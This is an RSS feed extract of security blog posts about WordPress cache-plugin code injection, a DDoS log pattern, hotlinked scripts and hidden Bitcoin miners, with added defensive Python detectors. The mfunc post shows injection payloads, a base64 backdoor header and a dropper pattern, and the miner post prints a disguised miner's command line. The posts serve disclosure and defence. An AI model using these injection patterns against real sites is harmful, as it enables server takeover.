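<p>The two request patterns above (a burst of 404s for a bogus path, then per-request-unique search queries arriving from many source IPs in the same second) can be picked out of an Apache access log with a few lines of Python. This is an added example, not code from the original post; the log lines it processes are constructed using documentation IP ranges, and the per-second threshold is an assumption.</p>

```python
"""Flag the two flood patterns described in the post in Apache combined-format logs:
a burst of 404s for the same bogus "Flood..." path, and a burst of WordPress search
requests (/?s=<timestamp-like number>) that defeat page caches.
Sample log lines are constructed for this example (documentation IP ranges)."""
import re
from collections import Counter, defaultdict

# Apache "combined" format; the referer and user-agent fields are optional so
# that "common" format lines (as in the 404 sample) parse too.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)
# WordPress search with a long numeric value: unique per request, so never cached.
SEARCH_RE = re.compile(r'^/\?s=\d{10,}$')

SAMPLE_LOG = [  # constructed
    '192.0.2.10 - - [01/May/2013:10:00:38 -0400] "GET /wp-content/uploads/2013/05/FloodFLOODFloodFLOOD.png HTTP/1.1" 404 0',
    '192.0.2.11 - - [01/May/2013:10:00:38 -0400] "GET /wp-content/uploads/2013/05/FloodFLOODFloodFLOODFloodFLOOD.png HTTP/1.1" 404 0',
    '192.0.2.12 - - [01/May/2013:10:00:38 -0400] "GET /wp-content/uploads/2013/05/FloodFLOODFloodFLOODFLOOD.png HTTP/1.1" 404 0',
    '198.51.100.5 - - [02/May/2013:11:57:30 -0400] "GET /?s=1367683016682 HTTP/1.1" 200 154 "http://referer.example/" "Mozilla/5.0"',
    '198.51.100.5 - - [02/May/2013:11:57:30 -0400] "GET /?s=1367683016683 HTTP/1.1" 200 154 "http://referer.example/" "Mozilla/5.0"',
    '198.51.100.6 - - [02/May/2013:11:57:30 -0400] "GET /?s=1367682722241 HTTP/1.1" 200 154 "http://referer.example/a" "Mozilla/5.0"',
    '198.51.100.7 - - [02/May/2013:11:57:30 -0400] "GET /?s=1367682708689 HTTP/1.1" 200 154 "http://other.example/" "MSIE 10.0"',
    '203.0.113.9 - - [02/May/2013:11:57:31 -0400] "GET /about/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]


def parse_line(line):
    """Parse one access-log line into a dict, or None if it is not in the expected format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec['second'] = rec['ts'].split()[0]  # "02/May/2013:11:57:30" (drop the timezone)
    return rec


def is_search_flood(rec):
    return bool(SEARCH_RE.match(rec['path']))


def is_404_flood(rec):
    return rec['status'] == '404' and 'Flood' in rec['path']


def analyze(lines, per_second_threshold=3):
    """Return {second: summary} for every second in which at least
    per_second_threshold distinct IPs sent a flood-style request."""
    by_second = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            by_second[rec['second']].append(rec)
    report = {}
    for second, recs in by_second.items():
        search_hits = [r for r in recs if is_search_flood(r)]
        not_found = [r for r in recs if is_404_flood(r)]
        uniq_ips = {r['ip'] for r in search_hits + not_found}
        # Many distinct sources in one second, each fetching a fresh uncached
        # URL, is the botnet signal; a single noisy client is a different problem.
        if len(uniq_ips) >= per_second_threshold:
            report[second] = {
                'search_flood': len(search_hits),
                'flood_404': len(not_found),
                'unique_ips': len(uniq_ips),
                # Referers are probably faked (see the post), but counting them
                # shows how few distinct values a botnet actually rotates through.
                'referers': Counter(r['referer'] for r in search_hits if r['referer']),
            }
    return report


def attacking_ips(lines):
    """Every source IP that sent at least one flood-style request (the botnet roster)."""
    ips = set()
    for line in lines:
        rec = parse_line(line)
        if rec and (is_search_flood(rec) or is_404_flood(rec)):
            ips.add(rec['ip'])
    return ips


if __name__ == '__main__':
    for second, summary in sorted(analyze(SAMPLE_LOG).items()):
        print(second, summary)
    print('distinct attacking IPs:', len(attacking_ips(SAMPLE_LOG)))
```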
]]></content:encoded>
			<wfw:commentRss>http://blog.sucuri.net/2013/05/malaysian-election-and-ddos.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://blog.sucuri.net/2013/05/malaysian-election-and-ddos.html</feedburner:origLink></item>
		<item>
		<title>W3 Total Cache and WP Super Cache Vulnerability Being Targeted in the Wild</title>
		<link>http://feedproxy.google.com/~r/SucuriSecurity/~3/r3Zo6r-nkFc/w3-total-cache-and-wp-super-cache-vulnerability-being-targeted-in-the-wild.html</link>
		<comments>http://blog.sucuri.net/2013/05/w3-total-cache-and-wp-super-cache-vulnerability-being-targeted-in-the-wild.html#comments</comments>
		<pubDate>Sat, 04 May 2013 04:03:27 +0000</pubDate>
		<dc:creator>Tony Perez</dc:creator>
				<category><![CDATA[Malware]]></category>
		<category><![CDATA[sucuri]]></category>
		<category><![CDATA[vulnerability]]></category>
		<category><![CDATA[WordPress]]></category>
		<category><![CDATA[awareness]]></category>
		<category><![CDATA[w3tc]]></category>
		<category><![CDATA[wp super cache]]></category>

		<guid isPermaLink="false">http://blog.sucuri.net/?p=7261</guid>
<description><![CDATA[As if on cue, almost 7 days since we released the post about the latest W3TC and WP Super Cache remote command execution vulnerability, we have started to see attacks spring up across our network. In our post you might remember this: &#60;!–mfunc echo PHP_VERSION; –&#62;&#60;!–/mfunc–&#62; In this example we explained how it was a<a class="more-link" href="http://blog.sucuri.net/2013/05/w3-total-cache-and-wp-super-cache-vulnerability-being-targeted-in-the-wild.html" rel="nofollow"><br /><strong>Read More</strong></a>]]></description>
				<content:encoded><![CDATA[<p>As if on cue, almost 7 days since we released the post about the latest <a href="http://blog.sucuri.net/2013/04/update-wp-super-cache-and-w3tc-immediately-remote-code-execution-vulnerability-disclosed.html">W3TC and WP Super Cache remote command execution vulnerability</a>, we have started to see attacks spring up across our network. </p>
<p>In our post you might remember this:</p>
<pre>
&lt;!–mfunc echo PHP_VERSION; –&gt;&lt;!–/mfunc–&gt;
</pre>
<p>In this example we explained how it was a very simple way of displaying the version of PHP on your server. A lot of questions followed along the lines of: well, what&#8217;s so harmful in that? With little help from us, the attackers have gone on to show us what they can do. </p>
<h4>Taking a Look at the Attacks</h4>
<p>In this section I&#8217;ll show you three of the various attacks we&#8217;re seeing. In each you can see how they abuse the mfunc vulnerability: one takes the more traditional approach of injecting a backdoor, another a more creative one that allows them to abuse HTTP headers. In every case the payload seems to be getting passed via comments, and we give an example of that below. This is obviously for educational purposes only.<br />
<span id="more-7261"></span></p>
<h5>Example One &#8211; Targeting HTTP Headers</h5>
<p>So in this example we see them abusing the <strong>mfunc</strong> vulnerability to pass shell commands via the HTTP headers in the place of the URL itself.</p>
<p><a href="http://blog.sucuri.net/2013/05/w3-total-cache-and-wp-super-cache-vulnerability-being-targeted-in-the-wild.html/screen-shot-2013-05-03-at-8-56-49-pm" rel="attachment wp-att-7287"><img src="http://blog.sucuri.net/wp-content/uploads/2013/05/Screen-Shot-2013-05-03-at-8.56.49-PM.png" alt="Screen Shot 2013-05-03 at 8.56.49 PM" width="1173" height="55" class="aligncenter size-full wp-image-7287" /></a></p>
<p>In this instance they are attacking your site while leaving very little trace, for instance they can do things like:</p>
<pre>
HTTP_CMD: Base64 encode of the backdoor/code they want to run
</pre>
<p>And it works with GET. Here is a better explanation if you&#8217;re not following:</p>
<p>A normal header would look something like this:</p>
<pre>
Connected to site.com (IP) port 80 (#0)
GET / HTTP/1.1
User-Agent: curl/7.24.0 (x86_64-apple-darwin12.0) libcurl/7.24.0 OpenSSL/0.9.8r zlib/1.2.5
Host: blog.sucuri.net
Accept: */*
</pre>
<p>With this attack it&#8217;d look something like this:</p>
<pre>
Connected to site.com (IP) port 80 (#0)
GET / HTTP/1.1
User-Agent: curl/7.24.0 (x86_64-apple-darwin12.0) libcurl/7.24.0 OpenSSL/0.9.8r zlib/1.2.5
Host: blog.sucuri.net
HTTP_CMD: Base64 encode of the backdoor/code they want to run
Accept: */*
</pre>
<p>Most folks would never even log that, so forensically speaking it&#8217;d be hard to know they were attacking this way. </p>
<h5>Example Two &#8211; Passing a Backdoor</h5>
<p>So in this example they misuse the <strong>mfunc</strong> and use it to pass a backdoor into your server. Not nice at all. </p>
<p><a href="http://blog.sucuri.net/2013/05/w3-total-cache-and-wp-super-cache-vulnerability-being-targeted-in-the-wild.html/screen-shot-2013-05-03-at-7-54-05-pm" rel="attachment wp-att-7269"><img src="http://blog.sucuri.net/wp-content/uploads/2013/05/Screen-Shot-2013-05-03-at-7.54.05-PM.png" alt="Screen Shot 2013-05-03 at 7.54.05 PM" width="1350" height="327" class="aligncenter size-full wp-image-7269" /></a></p>
<p>In this case it looks a bit worse, but when you decode it, it&#8217;s a lot easier to understand; here it is decoded:</p>
<p><a href="http://blog.sucuri.net/2013/05/w3-total-cache-and-wp-super-cache-vulnerability-being-targeted-in-the-wild.html/screen-shot-2013-05-03-at-7-56-09-pm" rel="attachment wp-att-7270"><img src="http://blog.sucuri.net/wp-content/uploads/2013/05/Screen-Shot-2013-05-03-at-7.56.09-PM.png" alt="Screen Shot 2013-05-03 at 7.56.09 PM" width="1345" height="213" class="aligncenter size-full wp-image-7270" /></a></p>
<p>Do you see what they&#8217;re doing? How they&#8217;re passing basic PHP commands to your server? Look here:</p>
<pre>
fopen
fputs
eval
base64_decode
fclose
</pre>
<p>They&#8217;re using basic PHP functions against you. They use fopen to open a new file called maeksv.php. They then inject the payload into that file using fputs, they encode it, and proceed to close the file. If you look at the payload that was dropped into that file you find something like this:</p>
<p><a href="http://blog.sucuri.net/2013/05/w3-total-cache-and-wp-super-cache-vulnerability-being-targeted-in-the-wild.html/screen-shot-2013-05-03-at-7-58-36-pm" rel="attachment wp-att-7271"><img src="http://blog.sucuri.net/wp-content/uploads/2013/05/Screen-Shot-2013-05-03-at-7.58.36-PM.png" alt="Screen Shot 2013-05-03 at 7.58.36 PM" width="1341" height="99" class="aligncenter size-full wp-image-7271" /></a></p>
<p>Don&#8217;t worry, a little fine tuning and you see its real intention here:</p>
<p><a href="http://blog.sucuri.net/2013/05/w3-total-cache-and-wp-super-cache-vulnerability-being-targeted-in-the-wild.html/screen-shot-2013-05-03-at-8-03-32-pm" rel="attachment wp-att-7272"><img src="http://blog.sucuri.net/wp-content/uploads/2013/05/Screen-Shot-2013-05-03-at-8.03.32-PM.png" alt="Screen Shot 2013-05-03 at 8.03.32 PM" width="1036" height="69" class="aligncenter size-full wp-image-7272" /></a></p>
<p>Using this the attacker can now do something like this:</p>
<pre>
http://goodsitebeingexploited/wp-content/cache/dcfay.php?jebfvlg=&lt;evil intentions&gt;
</pre>
<h5>Example Three &#8211; Embedded with Comments</h5>
<p>We know that these are occurring via comments but it&#8217;s always fun to see the things they say, like this for instance:</p>
<p><a href="http://blog.sucuri.net/2013/05/w3-total-cache-and-wp-super-cache-vulnerability-being-targeted-in-the-wild.html/screen-shot-2013-05-03-at-8-31-42-pm" rel="attachment wp-att-7279"><img src="http://blog.sucuri.net/wp-content/uploads/2013/05/Screen-Shot-2013-05-03-at-8.31.42-PM.png" alt="Screen Shot 2013-05-03 at 8.31.42 PM" width="1349" height="546" class="aligncenter size-full wp-image-7279" /></a></p>
<p>Or even this:</p>
<p><a href="http://blog.sucuri.net/2013/05/w3-total-cache-and-wp-super-cache-vulnerability-being-targeted-in-the-wild.html/screen-shot-2013-05-03-at-8-33-57-pm" rel="attachment wp-att-7280"><img src="http://blog.sucuri.net/wp-content/uploads/2013/05/Screen-Shot-2013-05-03-at-8.33.57-PM.png" alt="Screen Shot 2013-05-03 at 8.33.57 PM" width="1346" height="476" class="aligncenter size-full wp-image-7280" /></a></p>
<p>So in these scenarios they are leaving you what appear to be legitimate, yet silly, comments. If you&#8217;re none the wiser that&#8217;s all you&#8217;d see, approve and be on your way. </p>
<h3>Where are they Coming From</h3>
<p>Well, here are some of the IPs we&#8217;re picking up via our network:</p>
<p>Some quick look-ups show us IPs coming from all over &#8211; Netherlands, Brazil, China, Russia, Singapore... </p>
<h3>What To Do?</h3>
<p>The most obvious thing is to update immediately; both authors have made changes to their core to address these issues. That in and of itself will help you. Other options include the following:</p>
<ul>
<li>Leveraging a <a href="http://cloudproxy.sucuri.net">Web Application Firewall (WAF)</a></li>
<li>Adding CAPTCHAs to comments to deter spam bots</li>
<li>Ensure all comments are going through some kind of moderation</li>
<li>Don&#8217;t land the comments on your server, leverage 3rd party plugins &#8211; e.g., Disqus</li>
</ul>
<p>In the guidance above, do realize that a CAPTCHA won&#8217;t necessarily protect you if you go on to accept the comment, but it should slow bot attacks. </p>
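<p>One moderation check for the comment vector described above, written as an added example rather than code from this post or from either plugin: it scans comment text for the cache plugins&#8217; template tags, undoes HTML-entity escaping first (the tag arrives escaped in many comment stores), and reports the PHP functions and base64 payloads found inside. The mclude and dynamic-cached-content names are sibling tags the two plugins honoured that this post does not mention; the sample comments are constructed.</p>

```python
"""Scan submitted or stored WordPress comments for the cache-plugin template tags
(<!--mfunc ...-->, <!--mclude ...-->, <!--dynamic-cached-content-->) that the
vulnerability discussed in the post lets a commenter use to run PHP.
Handles the storage variations a moderator actually meets: entity-escaped
brackets (even double-escaped), mixed case, extra whitespace, and a body
wrapped in base64_decode(). Sample comments are constructed."""
import base64
import html
import re

# mfunc is the tag shown in the post; mclude and dynamic-cached-content are
# the sibling tags W3 Total Cache / WP Super Cache also honoured.
TAG_NAMES = ('mfunc', 'mclude', 'dynamic-cached-content')
TAG_RE = re.compile(
    r'<!--\s*(?P<name>' + '|'.join(TAG_NAMES) + r')\b(?P<body>.*?)-->',
    re.IGNORECASE | re.DOTALL,
)
# PHP functions seen in the decoded payload in the post (plus common siblings);
# reported so the moderator sees intent without decoding by hand.
SUSPICIOUS_FUNCS = ('eval', 'base64_decode', 'fopen', 'fputs', 'fwrite', 'system', 'exec')
B64_RE = re.compile(r'base64_decode\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)')

SAMPLE_COMMENTS = [  # constructed; the second one is the tag shown in the post
    'Great post, thanks for sharing!',
    '<!--mfunc echo PHP_VERSION; --><!--/mfunc-->',
    'Nice site &lt;!--MFUNC eval(base64_decode("ZWNobyAxOw==")); --&gt;',
    'Love it. <!-- just an ordinary HTML comment -->',
]


def normalize(text):
    """Undo entity escaping (e.g. &lt;!--mfunc, or &amp;lt; from double escaping)
    so the regex sees the real tag the plugin would see after output."""
    prev = None
    while prev != text:
        prev, text = text, html.unescape(text)
    return text


def decode_payloads(body):
    """Decode every base64_decode('...') literal in a tag body; skip invalid ones."""
    out = []
    for blob in B64_RE.findall(body):
        try:
            out.append(base64.b64decode(blob, validate=True).decode('utf-8', 'replace'))
        except (ValueError, UnicodeDecodeError):
            continue
    return out


def scan_comment(text):
    """Return a list of findings; an empty list means no template tag was present."""
    findings = []
    for m in TAG_RE.finditer(normalize(text)):
        body = m.group('body').strip()
        funcs = [f for f in SUSPICIOUS_FUNCS if re.search(r'\b' + f + r'\s*\(', body)]
        findings.append({
            'tag': m.group('name').lower(),
            'body': body,
            'functions': funcs,
            'decoded': decode_payloads(body),
        })
    return findings


def moderate(comments):
    """Split comments into (held, approved): anything carrying a tag is held."""
    held, approved = [], []
    for c in comments:
        (held if scan_comment(c) else approved).append(c)
    return held, approved


if __name__ == '__main__':
    for c in SAMPLE_COMMENTS:
        print(repr(c[:40]), '->', scan_comment(c) or 'clean')
```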
]]></content:encoded>
			<wfw:commentRss>http://blog.sucuri.net/2013/05/w3-total-cache-and-wp-super-cache-vulnerability-being-targeted-in-the-wild.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://blog.sucuri.net/2013/05/w3-total-cache-and-wp-super-cache-vulnerability-being-targeted-in-the-wild.html</feedburner:origLink></item>
		<item>
		<title>Who Really Owns Your Website? “Please Stop Hotlinking My Easing Script — Use a Real CDN Instead.”</title>
		<link>http://feedproxy.google.com/~r/SucuriSecurity/~3/9wirFA9wdWQ/who-really-owns-your-website-please-stop-hotlinking-my-easing-script-use-a-real-cdn-instead.html</link>
		<comments>http://blog.sucuri.net/2013/05/who-really-owns-your-website-please-stop-hotlinking-my-easing-script-use-a-real-cdn-instead.html#comments</comments>
		<pubDate>Fri, 03 May 2013 18:35:50 +0000</pubDate>
		<dc:creator>Daniel Cid</dc:creator>
				<category><![CDATA[education]]></category>
		<category><![CDATA[hardening]]></category>
		<category><![CDATA[research]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://blog.sucuri.net/?p=7215</guid>
		<description><![CDATA[For the last few days, we have had some customers come to us worried thinking that their websites were compromised with some type of pop-up malware. Every time they visited their own site they would get a strange pop up: &#8220;Please stop hotlinking my easing script — use a real CDN instead. Many thanks&#8221; What<a class="more-link" href="http://blog.sucuri.net/2013/05/who-really-owns-your-website-please-stop-hotlinking-my-easing-script-use-a-real-cdn-instead.html" rel="nofollow"><br /><strong>Read More</strong></a>]]></description>
				<content:encoded><![CDATA[<p>For the last few days, we have had some customers come to us worried thinking that their websites were compromised with some type of pop-up malware. Every time they visited their own site they would get a strange pop up:</p>
<blockquote><p>
&#8220;Please stop hotlinking my easing script — use a real CDN instead. Many thanks&#8221;
</p></blockquote>
<h5>What is going on?</h5>
<p>We did some Google searches and found hundreds of threads with people worried about the same thing. Out of nowhere, that pop-up was showing up on their web sites. Were they all hacked?</p>
<p><img src="http://blog.sucuri.net/wp-content/uploads/2013/05/Screen-Shot-2013-05-02-at-4.26.02-PM-650x339.png" alt="Screen Shot 2013-05-02 at 4.26.02 PM" width="650" height="339" class="aligncenter size-large wp-image-7220" /><br />
<span id="more-7215"></span><br />
Through further research we found that all of the sites in the results had a JavaScript include from: http://gsgd.co.uk/sandbox/jquery/easing/jquery.easing.1.3.js.  This file is part of the popular <strong><em>jQuery Easing Plugin</em></strong>. It seems the author of that plugin got upset that many people were linking directly from his site, and modified the content of that file to give that warning instead. He <a href="https://github.com/gdsmith/jquery.easing">posted</a> an explanation on his site about it:</p>
<blockquote><p>
Popup? If you&#8217;re coming here because of a popup on your site I&#8217;m sorry, but the increased hotlinking has caused me issues with my hosting company so I&#8217;m taking steps to try and sort it out. Please upload the script to your own server and update any urls pointing to gsgd.co.uk to use that version of the file or you could try using the above url for CDN (though this currently only has the 1.3 easing script, look at http://cdnjs.com/ for more info and maybe try and add any missing files/versions still in use).</p>
<p>Please also note, I have no problem with anyone&#8217;s use of the plugin without my knowledge or permission, it&#8217;s just the hotlinking that&#8217;s causing me a headache.
</p></blockquote>
<h5>Who Really owns your site?</h5>
<p>Most users had no idea that they were even using that plugin. Most developers that include it probably didn&#8217;t even think about the hotlinking issue. It seems the plugin documentation used to give examples pointing to gsgd.co.uk, so developers just copied and pasted directly into their sites.</p>
<p>What was more worrying to our client was the power that someone else had over their site. </p>
<h5>You are not really the only owner of your site</h5>
<p>Every time you add a remote JavaScript (or widget or iFrame) to your site, you are giving the server that houses that code full control of what is displayed to your users. If their servers get compromised, your site will be compromised as well. </p>
<p>Can you imagine if the author of the Easing Plugin was malicious? Instead of just that pop-up, they could have added a URL redirect to send all your users to any site of their choosing (SPAM, porn, you name it). What if their server was hacked? The attackers could have added malware and it would have loaded for all your users.</p>
<p>This is very common. For example, look at the techcrunch.com website (big news outlet). They load JavaScript from all these domains:</p>
<pre>
http://o.aolcdn.com/
http://pshared.5min.com/
http://js.adsonar.com/
http://scorecardresearch.com/
http://tctechcrunch2011.wordpress.com/
http://platform.twitter.com/
http://connect.facebook.net/
https://apis.google.com/
http://cdn.optimizely.com/
http://r-login.wordpress.com/
http://cdn.insights.gravity.com/
</pre>
<p>So their security depends not only on their own site: if any of those 11 sites they include gets hacked, it will affect their users as well. </p>
<p>They are not alone. Our own blog includes code from:</p>
<pre>
http://disqus.com
http://s.gravatar.com
http://stats.wordpress.com
http://connect.facebook.net/
</pre>
<p>So our blog&#8217;s security also depends on those 4 sites (Facebook, Disqus, Gravatar and WordPress). Including code from Google CDN, Twitter, Facebook or any major publisher is likely low risk, as they have a pretty good level of security. That said, there is still a level of risk you are accepting for you and your visitors. Another thing to consider is that the risk increases significantly when you include code from smaller and less known locations. </p>
<h5>The Solution?</h5>
<p>If you are using this plugin, just remove the include from gsgd.co.uk, download the plugin and store it locally. That&#8217;s an easy fix.</p>
<p>I also recommend that you look at the source of your site to see what else you have included. </p>
<p>Do a view-source: in your browser and search for &lt;script or &lt;iframe to see what is being loaded. You might be surprised. Our <a href="http://sitecheck.sucuri.net">SiteCheck Scanner</a> also prints a list of the JavaScript and iframe links we found, so you can use that as well.</p>
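<p>The view-source check above done programmatically, as an added example that is not part of the original post: it lists every origin a page loads scripts or iframes from and splits them against an allow-list of hosts you have decided to trust. The sample HTML, page URL, widget host and allow-list are constructed; the gsgd.co.uk URL is the one discussed above.</p>

```python
"""List every third-party origin a page pulls <script> or <iframe> content from,
then split those origins into ones on an allow-list and ones that need review.
This is the "search the source for <script or <iframe" check from the post,
automated. The sample HTML, page URL and allow-list are constructed."""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

SAMPLE_HTML = """<html><head>
<script src="/wp-includes/js/jquery.js"></script>
<script src="http://gsgd.co.uk/sandbox/jquery/easing/jquery.easing.1.3.js"></script>
<script src="//connect.facebook.net/en_US/all.js"></script>
<script type="text/javascript">var inline = 1;</script>
</head><body>
<iframe src="http://widgets.example.net/embed/123" width="300" height="80"></iframe>
<iframe src="about:blank"></iframe>
</body></html>"""  # constructed page; widgets.example.net is a placeholder host


class IncludeCollector(HTMLParser):
    """Collect the src of every <script> and <iframe> tag, resolved to an absolute URL."""

    def __init__(self, base_url):
        super().__init__()
        self.base_url = base_url
        self.includes = []  # list of (tag, absolute_url)

    def handle_starttag(self, tag, attrs):
        if tag not in ('script', 'iframe'):
            return
        src = dict(attrs).get('src')
        if src:
            # urljoin resolves relative (/x.js) and protocol-relative (//host/x.js)
            # references the way the browser will.
            self.includes.append((tag, urljoin(self.base_url, src.strip())))


def third_party_includes(html_text, base_url):
    """Return {origin: [urls]} for includes served from a host other than the page's own."""
    parser = IncludeCollector(base_url)
    parser.feed(html_text)
    own_host = urlsplit(base_url).hostname
    result = {}
    for _tag, url in parser.includes:
        parts = urlsplit(url)
        # about:, data:, javascript: and same-host includes are not remote code.
        if parts.scheme not in ('http', 'https') or parts.hostname == own_host:
            continue
        origin = f'{parts.scheme}://{parts.hostname}'
        result.setdefault(origin, []).append(url)
    return result


def review(html_text, base_url, trusted_hosts):
    """Split third-party origins into (trusted, untrusted) by host allow-list.
    Anything in `untrusted` is a party that can change what your visitors run."""
    trusted, untrusted = {}, {}
    for origin, urls in third_party_includes(html_text, base_url).items():
        host = urlsplit(origin).hostname
        (trusted if host in trusted_hosts else untrusted)[origin] = urls
    return trusted, untrusted


if __name__ == '__main__':
    ok, needs_review = review(SAMPLE_HTML, 'http://www.example.com/', {'connect.facebook.net'})
    print('allow-listed:', sorted(ok))
    print('review or host locally:', sorted(needs_review))
```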
]]></content:encoded>
			<wfw:commentRss>http://blog.sucuri.net/2013/05/who-really-owns-your-website-please-stop-hotlinking-my-easing-script-use-a-real-cdn-instead.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://blog.sucuri.net/2013/05/who-really-owns-your-website-please-stop-hotlinking-my-easing-script-use-a-real-cdn-instead.html</feedburner:origLink></item>
		<item>
		<title>Game of Coins: The Uprise of Bitcoin Mining</title>
		<link>http://feedproxy.google.com/~r/SucuriSecurity/~3/mfmk7PazkrI/game-of-coins-the-uprise-of-bitcoin-mining.html</link>
		<comments>http://blog.sucuri.net/2013/05/game-of-coins-the-uprise-of-bitcoin-mining.html#comments</comments>
		<pubDate>Thu, 02 May 2013 20:14:20 +0000</pubDate>
		<dc:creator>Dre Armeda</dc:creator>
				<category><![CDATA[backdoors]]></category>
		<category><![CDATA[bitcoin]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[Server Compromise]]></category>
		<category><![CDATA[sucuri]]></category>
		<category><![CDATA[vulnerability]]></category>
		<category><![CDATA[compromise]]></category>
		<category><![CDATA[server]]></category>

		<guid isPermaLink="false">http://blog.sucuri.net/?p=7048</guid>
		<description><![CDATA[Research by Daniel Cid. Authored by Dre Armeda. One thing you can&#8217;t take away from some of the attackers we deal with everyday is their creativity. From time to time we write about new trends we&#8217;re seeing, and this post is no different. We&#8217;re seeing a new tactic recently, and it may be affecting your<a class="more-link" href="http://blog.sucuri.net/2013/05/game-of-coins-the-uprise-of-bitcoin-mining.html" rel="nofollow"><br /><strong>Read More</strong></a>]]></description>
				<content:encoded><![CDATA[<p><small>Research by <a href="https://twitter.com/danielcid">Daniel Cid</a>. Authored by <a href="https://twitter.com/dremeda">Dre Armeda</a>. </small></p>
<hr />
<p>One thing you can&#8217;t take away from some of the attackers we deal with every day is their creativity. From time to time we write about new trends we&#8217;re seeing, and this post is no different. We&#8217;re seeing a new tactic recently, and it may be affecting your pockets, even if you&#8217;re not into the latest trend of using digital currency.  </p>
<p><img src="http://blog.sucuri.net/wp-content/uploads/2013/04/game-of-coins.png" alt="Game of Coins" width="780" height="208" class="aligncenter size-full wp-image-7064" /></p>
<h4>Digital currency you say?</h4>
<p>I sure did! <a href="http://bitcoin.org/en/" title="Bitcoin">Bitcoin</a> to be exact.<br />
<span id="more-7048"></span><br />
Bitcoin is not widely adopted yet, and the currency currently trades outside the control of centralized banks. You may not know what a Bitcoin is, and don&#8217;t worry, a lot of people still don&#8217;t. </p>
<p>This doesn&#8217;t mean this isn&#8217;t important, or doesn&#8217;t apply to you, so make sure to read on and learn.<br />
<!--more--><br />
From the Bitcoin website:</p>
<blockquote><p>
Bitcoin is a digital currency, a protocol, and a software that enables</p>
<ul>
<li>Instant peer-to-peer transactions</li>
<li>Worldwide payments</li>
<li>Low or zero processing fees</li>
<li>And much more!</li>
</ul>
</blockquote>
<p>Still not following? Here&#8217;s a better definition that may help:</p>
<blockquote><p>
Bitcoin is an experimental, decentralized digital currency that enables instant payments to anyone, anywhere in the world. Bitcoin uses peer-to-peer technology to operate with no central authority: managing transactions and issuing money is carried out collectively by the network.
</p></blockquote>
<p>Here is a quick video explaining the peer-to-peer, open source currency:</p>
<p><iframe width="780" height="315" src="http://www.youtube.com/embed/Um63OQz3bjo" frameborder="0" allowfullscreen></iframe></p>
<p>This sounds awesome to me. An anti-authoritarian currency that&#8217;s already in active use, and being adopted by some pretty big names! </p>
<p>If you&#8217;re a WordPress.com user, you can now pay for upgrades using Bitcoin. Ever purchase anything on Etsy.com? That&#8217;s right, there are currently near 100 vendors accepting the digital payment option. NameCheap, Reddit, and 4Chan round up a quick list of names featured in a <a href="http://mashable.com/2013/03/29/bitcoin-vendors/" title="Mashable">Mashable article</a> about Bitcoin recently.</p>
<p>Staying power is still undetermined, but for now the currency continues to grow, and that&#8217;s important to know.</p>
<h4>Mining for Gold</h4>
<p>Now that you have a better understanding of this growing crypto-currency, we&#8217;re going to chat a bit about generating the currency, and then we&#8217;ll move on to our little discovery. </p>
<p>Although we&#8217;d all love to have a real money tree, you&#8217;re in the wrong forest if you think you found it here. However, the currency still needs to be generated, and it&#8217;s a fairly complex process named <a href="https://en.bitcoin.it/wiki/Mining" title="Bitcoin Mining">Mining</a>. </p>
<p>Paper money is usually created and distributed by governments; in the case of Bitcoin, there is no government. With Bitcoin you have Miners. Bitcoin Miners are entities that use special software to solve difficult math problems, and in exchange are issued a certain amount of Bitcoins. </p>
<p>Here&#8217;s a great video explaining the process of Mining, its importance, and how heavy the process can be.</p>
<p><iframe width="780" height="315" src="http://www.youtube.com/embed/GmOzih6I1zs" frameborder="0" allowfullscreen></iframe></p>
<p>In the early days Miners were quickly solving the math problems needed to generate bitcoins locally on their personal computers. This became more difficult because the processing power needed to solve the necessary math problems continued to rise as the network of Miners grew. The math problems continued to become more resource intensive, which led to the production of commercial processors reprogrammed specifically for Mining. </p>
<p>The processes and technologies used to generate Bitcoins have seen various iterations. Even today, as more Miners join the network, the math problems continue to grow more complex. </p>
<p>This is where Pools come into play. Pools are groups or units of Miners. Pools are able to solve problems faster, and in turn are rewarded for their contributions. Although this distributes the heavy resource load, it certainly doesn&#8217;t offload the resource requirement completely. There is still a demand for processing power and resources to perform the computations needed to solve the problems. </p>
<p>Where do we go to get these resources if we want to compute faster? Therein lies our little discovery.</p>
<h4>What the Falcon?</h4>
<p>We see a lot of different attacks. We see a lot of vulnerabilities leading to various categories of compromised websites. Our research in this case leads us towards a different type of payload, a different type of exploit. To be fair, this is a new world of digital payment, and there will likely be future efforts by attackers.</p>
<p>Instead of injecting malware or SPAM, or even performing the usual malicious acts we normally blog about, the attackers are hiding Bitcoin Mining software below the application layer in the stack. Ultimately what they are doing is attacking the server to leverage its resources for their Mining purposes.</p>
<h4>How&#8217;s it Happening?</h4>
<p>The first case we discovered was a few weeks ago. A website we were cleaning was suspended for using far too many resources. During remediation we took a look at the process list and what do you know, hidden inside <code>/var/www/site.com/wp-content/plugins/akismet/mysqld</code> we found a Miner running and masking itself as the mysqld binary. </p>
<p>We took a quick look at the processor resources by running the <strong><em>top</em></strong> command in terminal:</p>
<pre>
30104 userx 18 0 311m 9176 2020 S 97.2 0.3 4916:23 ./mysqld --url http://pool.give-me-ltc.com:8080
</pre>
<p>The top results show that this mysqld binary has been running for many hours and consuming almost 100% of the CPU resources. Keep in mind that this is a large web server hosting thousands of websites. After a few days pegged at 100% CPU usage the hosting company noticed and shut the client down.</p>
<p>That was the first case, but not the last. What first appeared to be an anomaly is now repeating. Here is a sample from another website that was banned for using too many resources:</p>
<p>Again a quick top command and the proof is in the pudding:</p>
<pre>
22274 usery 20 0 249m 4612 824 S 29.1 0.0 124:39.70 ../mine.16 --url=http://vibehacks.net/ --userpass=HIDDEN 
</pre>
